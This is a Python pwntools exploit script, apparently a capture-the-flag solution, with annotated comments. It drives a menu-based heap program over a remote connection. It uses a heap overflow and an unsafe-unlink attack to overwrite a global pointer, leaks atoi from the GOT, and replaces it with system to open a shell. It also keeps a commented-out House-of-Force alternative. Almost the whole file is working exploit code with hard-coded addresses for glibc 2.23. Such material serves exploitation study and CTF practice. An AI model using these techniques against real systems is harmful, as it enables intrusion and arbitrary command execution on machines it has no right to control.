- #!/usr/bin/env python
- # -*- coding: utf-8 -*-
- #from pwnpwnpwn import *
- from pwn import *
r = remote(host,port)  # NOTE(review): `host` and `port` are never defined in this listing; they must be set (or replaced with literals) before the script can run
def additem(length, name):
    """Menu option 2: allocate a new item of `length` bytes filled with `name`.

    Drives the target's menu over the global tube `r`: answers the prompt with
    "2", then the length, then the content.  Each answer waits for the next
    ":"-terminated prompt first.
    """
    for answer in ("2", str(length), name):
        r.recvuntil(":")
        r.sendline(answer)
def modify(idx, length, name):
    """Menu option 3: overwrite item `idx` with `length` bytes of `name`.

    The exploit below passes a `length` far larger than the original
    allocation (0x300 for an 0x80-byte item), so the target evidently does not
    bound this write by the stored size -- that is the heap overflow being
    abused.
    """
    for answer in ("3", str(idx), str(length), name):
        r.recvuntil(":")
        r.sendline(answer)
def remove(idx):
    """Menu option 4: free item `idx` (this is the free() that triggers unlink)."""
    for answer in ("4", str(idx)):
        r.recvuntil(":")
        r.sendline(answer)
def show():
    """Menu option 1: print every stored item.

    The leak below parses item 0's line, which the target prints as
    ``"0 : <name>"``.
    """
    r.recvuntil(":")
    r.sendline("1")
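# ---------------------------------------------------------------------------
# Exploit body (unsafe-unlink -> GOT overwrite -> system("sh")).
#
# Python 2 pwntools only: str and bytes are mixed freely below (p64() output
# concatenated with "a"*n, ljust(8, "\x00")), so this will not run unmodified
# on Python 3.
#
# Every address is hard-coded for a non-PIE target and for the Ubuntu 16.04
# glibc 2.23 build (atoi@0x36e80, system@0x45390); the script is tied to that
# exact binary/libc pair and will corrupt the GOT with garbage on any other.
# ---------------------------------------------------------------------------
magic = 0x400d49  # address of the binary's win function ("disas magic");
                  # only used by the alternative path commented out at the end

# Stage 1: three 0x80-byte items -> adjacent heap chunks p, q, r.
additem(0x80, "a")  # item 0 -> chunk p
additem(0x80, "b")  # item 1 -> chunk q
additem(0x80, "c")  # item 2 -> chunk r

# P is the global slot unlink() will overwrite.  From the way stages 2-3 use
# it, it is evidently item 1's name pointer, with item 0's record (length,
# name) living at 0x6020c0 / 0x6020c8.
P = 0x6020d8
fake_prev = 0
fake_size = 0x81
fd = P - 0x18  # fd->bk == P
bk = P - 0x10  # bk->fd == P   (the only checks the glibc-2.23 unlink performs)

# Overflow item 0 (chunk p) into q and r:
#   - "a"*0x90 fills p's 0x80 data bytes and q's 0x10-byte chunk header;
#   - the next four words are the fake chunk at q's data (first two header
#     words as the original wrote them, then fd/bk -- as far as I can tell
#     only fd/bk matter to the 2.23 unlink check);
#   - 0x60 zero bytes pad up to r's chunk header;
#   - r.prev_size = 0x80 points back at the fake chunk and r.size = 0x90 has
#     PREV_INUSE clear, so free(r) consolidates backwards and calls unlink().
payload = "".join([
    "a" * 0x90,
    p64(fake_size),
    p64(fake_prev),
    p64(fd),
    p64(bk),
    "\x00" * 0x60,
    p64(fake_size - 1),
    p64(0x90),
])
modify(0, 0x300, payload)
remove(2)  # free(r): unlink() sets *P = fd, i.e. item 1's name -> 0x6020c0

# Stage 2: item 1's name pointer now aliases the item table, so "modifying"
# item 1 rewrites item 0's record to {length=0xdeadbeef, name=&atoi@GOT}.
atoi_got = 0x0000000000602068
modify(1, 0x80, p64(0xdeadbeef) + p64(atoi_got))

# Stage 3: show() prints item 0, i.e. the contents of atoi@GOT -> atoi address.
show()
r.recvuntil("0 : ")
leak = r.recvuntil("\n")[:-1][:6]  # 6 significant bytes of a 64-bit pointer
atoi_addr = u64(leak.ljust(8, "\x00"))

# Cheap sanity check: with atoi at libc+0x36e80 and libc page-aligned, the low
# 12 bits of the leak must be 0xe80.  Fail loudly instead of writing a bogus
# "system" address into the GOT (wrong libc build, failed unlink, or a leak
# truncated by a 0x0a byte).
if atoi_addr & 0xfff != 0x36e80 & 0xfff:
    log.error("unexpected atoi leak %#x: wrong libc or unlink failed" % atoi_addr)

libc = atoi_addr - 0x36e80  # atoi offset, Ubuntu 16.04 glibc 2.23
system = libc + 0x45390     # system offset, same libc
log.info("atoi   @ %#x" % atoi_addr)
log.info("libc   @ %#x" % libc)
log.info("system @ %#x" % system)

# Stage 4: item 0's name still points at atoi@GOT; overwrite it with system.
# The menu parses its input with atoi(), so the next choice "sh" becomes
# system("sh").
modify(0, 0x8, p64(system))
r.recvuntil(":")
r.sendline("sh")

# Alternative path left by the original author (unused): overwrite the top
# chunk size with -1, allocate a negative size to move the top pointer, then
# drop `magic` over a function pointer -- looks like a House-of-Force style
# approach.
# additem(0x70,"ddaa")
# modify(0,0x81,"a"*0x78 + p64(0xffffffffffffffff))
# additem(-0xb0,"dada")
# additem(0x20, "a"*8 + p64(magic))
r.interactive()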